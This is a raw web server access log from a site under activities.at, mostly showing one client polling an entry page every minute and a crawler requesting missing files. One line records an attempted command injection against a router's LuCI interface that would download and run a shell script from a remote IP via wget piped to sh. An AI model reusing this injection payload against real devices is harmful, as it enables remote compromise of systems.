178.165.191.42 - - [23/Dec/2024:14:09:31 +0100] "GET /gui/javascript/form_form.js?1734959371 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959310" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:10:31 +0100] "GET /entry.php?id=10271&&ser=959371 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959310" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:10:31 +0100] "GET /gui/javascript/form_form.js?1734959431 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959371" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:11:31 +0100] "GET /entry.php?id=10271&&ser=959431 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959371" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:11:31 +0100] "GET /gui/javascript/form_form.js?1734959491 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959431" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:12:32 +0100] "GET /entry.php?id=10271&&ser=959491 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=959431" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:12:32 +0100] "GET /gui/javascript/form_form.js?1734959552 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959491" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:13:32 +0100] "GET /entry.php?id=10271&&ser=959552 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959491" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:13:32 +0100] "GET /gui/javascript/form_form.js?1734959612 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959552" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:14:32 +0100] "GET /entry.php?id=10271&&ser=959612 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959552" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:14:32 +0100] "GET /gui/javascript/form_form.js?1734959672 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959612" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:15:33 +0100] "GET /entry.php?id=10271&&ser=959672 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=959612" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:15:33 +0100] "GET /gui/javascript/form_form.js?1734959733 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959672" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:16:33 +0100] "GET /entry.php?id=10271&&ser=959733 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959672" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:16:33 +0100] "GET /gui/javascript/form_form.js?1734959793 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:17:33 +0100] "GET /entry.php?id=10271&&ser=959793 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959733" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:17:33 +0100] "GET /gui/javascript/form_form.js?1734959853 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:18:33 +0100] "GET /entry.php?id=10271&&ser=959853 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959793" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:18:34 +0100] "GET /gui/javascript/form_form.js?1734959913 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959853" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:19:34 +0100] "GET /entry.php?id=10271&&ser=959913 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959853" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:19:34 +0100] "GET /gui/javascript/form_form.js?1734959974 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959913" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:20:34 +0100] "GET /entry.php?id=10271&&ser=959974 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959913" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:20:34 +0100] "GET /gui/javascript/form_form.js?1734960034 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=959974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:21:34 +0100] "GET /entry.php?id=10271&&ser=960034 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=959974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:21:34 +0100] "GET /gui/javascript/form_form.js?1734960094 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960034" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:22:35 +0100] "GET /entry.php?id=10271&&ser=960094 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960034" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:22:35 +0100] "GET /gui/javascript/form_form.js?1734960155 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960094" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:23:35 +0100] "GET /entry.php?id=10271&&ser=960155 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960094" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:23:35 +0100] "GET /gui/javascript/form_form.js?1734960215 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:24:36 +0100] "GET /entry.php?id=10271&&ser=960215 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960155" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:24:36 +0100] "GET /gui/javascript/form_form.js?1734960276 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:25:36 +0100] "GET /entry.php?id=10271&&ser=960276 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=960215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:25:36 +0100] "GET /gui/javascript/form_form.js?1734960336 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:26:36 +0100] "GET /entry.php?id=10271&&ser=960336 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:26:36 +0100] "GET /gui/javascript/form_form.js?1734960396 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:27:36 +0100] "GET /entry.php?id=10271&&ser=960396 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:27:37 +0100] "GET /gui/javascript/form_form.js?1734960456 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:28:37 +0100] "GET /entry.php?id=10271&&ser=960456 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960396" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:28:37 +0100] "GET /gui/javascript/form_form.js?1734960517 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960456" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /entry.php?id=10271&&ser=960517 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960456" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:29:37 +0100] "GET /gui/javascript/form_form.js?1734960577 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:30:37 +0100] "GET /entry.php?id=10271&&ser=960577 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960517" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:30:37 +0100] "GET /gui/javascript/form_form.js?1734960637 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:31:38 +0100] "GET /entry.php?id=10271&&ser=960637 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=960577" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:31:38 +0100] "GET /gui/javascript/form_form.js?1734960698 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:32:38 +0100] "GET /entry.php?id=10271&&ser=960698 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960637" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:32:38 +0100] "GET /gui/javascript/form_form.js?1734960758 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:33:38 +0100] "GET /entry.php?id=10271&&ser=960758 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:33:38 +0100] "GET /gui/javascript/form_form.js?1734960818 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960758" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:34:38 +0100] "GET /entry.php?id=10271&&ser=960818 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960758" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:34:39 +0100] "GET /gui/javascript/form_form.js?1734960879 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960818" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:35:39 +0100] "GET /entry.php?id=10271&&ser=960879 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960818" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:35:39 +0100] "GET /gui/javascript/form_form.js?1734960939 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960879" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:36:39 +0100] "GET /entry.php?id=10271&&ser=960939 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960879" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:36:39 +0100] "GET /gui/javascript/form_form.js?1734960999 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960939" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:37:39 +0100] "GET /entry.php?id=10271&&ser=960999 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960939" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:37:40 +0100] "GET /gui/javascript/form_form.js?1734961060 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=960999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:38:40 +0100] "GET /entry.php?id=10271&&ser=961060 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=960999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:38:40 +0100] "GET /gui/javascript/form_form.js?1734961120 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961060" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:39:40 +0100] "GET /entry.php?id=10271&&ser=961120 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961060" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:39:40 +0100] "GET /gui/javascript/form_form.js?1734961180 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:40:40 +0100] "GET /entry.php?id=10271&&ser=961180 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961120" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:40:40 +0100] "GET /gui/javascript/form_form.js?1734961240 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961180" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:41:41 +0100] "GET /entry.php?id=10271&&ser=961240 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961180" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:41:41 +0100] "GET /gui/javascript/form_form.js?1734961301 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:42:41 +0100] "GET /entry.php?id=10271&&ser=961301 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:42:41 +0100] "GET /gui/javascript/form_form.js?1734961361 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961301" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:43:41 +0100] "GET /entry.php?id=10271&&ser=961361 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961301" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:43:41 +0100] "GET /gui/javascript/form_form.js?1734961421 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961361" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:44:42 +0100] "GET /entry.php?id=10271&&ser=961421 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961361" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:44:42 +0100] "GET /gui/javascript/form_form.js?1734961482 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961421" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:45:42 +0100] "GET /entry.php?id=10271&&ser=961482 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961421" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:45:42 +0100] "GET /gui/javascript/form_form.js?1734961542 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961482" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:46:42 +0100] "GET /entry.php?id=10271&&ser=961542 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961482" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:46:42 +0100] "GET /gui/javascript/form_form.js?1734961602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961542" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:47:43 +0100] "GET /entry.php?id=10271&&ser=961602 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961542" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:47:43 +0100] "GET /gui/javascript/form_form.js?1734961663 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:48:43 +0100] "GET /entry.php?id=10271&&ser=961663 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:48:43 +0100] "GET /gui/javascript/form_form.js?1734961723 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961663" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:49:43 +0100] "GET /entry.php?id=10271&&ser=961723 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961663" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:49:43 +0100] "GET /gui/javascript/form_form.js?1734961783 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961723" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [23/Dec/2024:14:50:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002261003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:14:50:44 +0100] "GET /entry.php?id=10271&&ser=961783 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=961723" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:50:44 +0100] "GET /gui/javascript/form_form.js?1734961844 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961783" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.16.39.9 - - [23/Dec/2024:14:50:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
31.220.1.144 - - [23/Dec/2024:14:51:13 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.191.42 - - [23/Dec/2024:14:51:44 +0100] "GET /entry.php?id=10271&&ser=961844 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961783" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:51:44 +0100] "GET /gui/javascript/form_form.js?1734961904 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961844" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:52:44 +0100] "GET /entry.php?id=10271&&ser=961904 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961844" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:52:44 +0100] "GET /gui/javascript/form_form.js?1734961964 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961904" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:53:44 +0100] "GET /entry.php?id=10271&&ser=961964 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961904" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [23/Dec/2024:14:53:45 +0100] "GET /gui/javascript/form_form.js?1734962025 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=961964" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [23/Dec/2024:14:54:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003091503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [23/Dec/2024:14:54:45 +0100] "GET /entry.php?id=10271&&ser=962025 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=961964" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
